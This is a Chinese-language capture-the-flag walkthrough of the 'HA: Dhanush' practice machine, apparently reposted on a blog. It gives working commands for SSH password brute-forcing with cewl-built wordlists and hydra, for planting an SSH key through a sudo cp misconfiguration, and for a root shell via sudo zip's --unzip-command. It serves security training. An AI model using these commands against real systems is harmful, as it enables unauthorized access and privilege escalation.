HA: Dhanush靶机渗透测试
生活随笔
收集整理的这篇文章主要介绍了
HA: Dhanush靶机渗透测试
小编觉得挺不错的,现在分享给大家,帮大家做个参考.
文章目录
- 一、信息收集
- 1.主机发现
- 2.端口扫描
- 3.查看 web 服务
- 二、漏洞挖掘
- 1.使用 cewl 生成字典
- 2.使用 hydra 进行爆破
- 3.ssh 连接
- 4.尝试 sudo 提权
靶机介绍:
一、信息收集
1.主机发现
arp-scan -l
发现靶机 ip:192.168.1.119
2.端口扫描
nmap -A -p- 192.168.1.119
发现开放了 80 端口,Apache 服务,ubuntu系统;
65345 端口,ssh 服务
3.查看 web 服务
访问 192.168.1.119:
发现介绍 dhanush,没有什么特别的
二、漏洞挖掘
1.使用 cewl 生成字典
没有什么信息,根据提示:枚举,我们尝试从靶机的 web 服务生成 ssh 登陆的账号密码进行遍历爆破
cewl http://192.168.1.119/ -w dict.txt #生成密码
john --wordlist=dict.txt --stdout --rules > ./users.txt #生成用户名列表
2.使用 hydra 进行爆破
hydra -L ./users.txt -P ./dict.txt 192.168.1.119 ssh -s 65345 -e nsr -t 30
爆破时间较长,大概需要 10 分钟左右
3.ssh 连接
ssh pinak@192.168.1.119 -p 65345
yes
Gandiv
4.尝试 sudo 提权
发现可以以 sarang 用户权限使用 cp,查看该用户信息
发现 sarang 路径下有 .ssh 目录,尝试进入但是没有权限,结合 sudo -l 得到的可以 sarang 权限执行 cp ,尝试在当前用户创建 ssh,将公钥复制到 sarang 路径去然后使用 ssh 连接
cd ~
ssh-keygen #生成ssh密钥(我这里是一直回车无密码)
chmod 777 ./.ssh/id_rsa.pub
cp .ssh/id_rsa.pub /home/pinak
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345
经过一番操作可以看到我们进入了 sarang 用户
再次尝试 sudo 提权
发现可以以 root 权限执行 zip 命令,进行利用获得 root 权限
touch dhanush
sudo zip /tmp/dhanush.zip /home/sarang/dhanush -T --unzip-command="sh -c /bin/bash"
cd /root
总结
以上是生活随笔为你收集整理的HA: Dhanush靶机渗透测试的全部内容,希望文章能够帮你解决所遇到的问题。
- 上一篇: Lampiao靶机渗透测试
- 下一篇: HA: Forensics靶机渗透测试